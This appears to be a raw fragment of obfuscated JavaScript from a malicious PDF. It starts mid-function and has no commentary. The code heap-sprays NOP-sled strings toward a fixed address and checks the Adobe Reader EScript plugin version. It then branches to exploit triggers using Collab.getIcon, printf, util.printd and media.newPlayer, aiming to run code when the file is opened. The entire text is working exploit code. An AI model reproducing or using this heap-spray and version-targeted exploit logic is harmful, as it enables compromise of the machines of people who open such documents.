yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('	');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}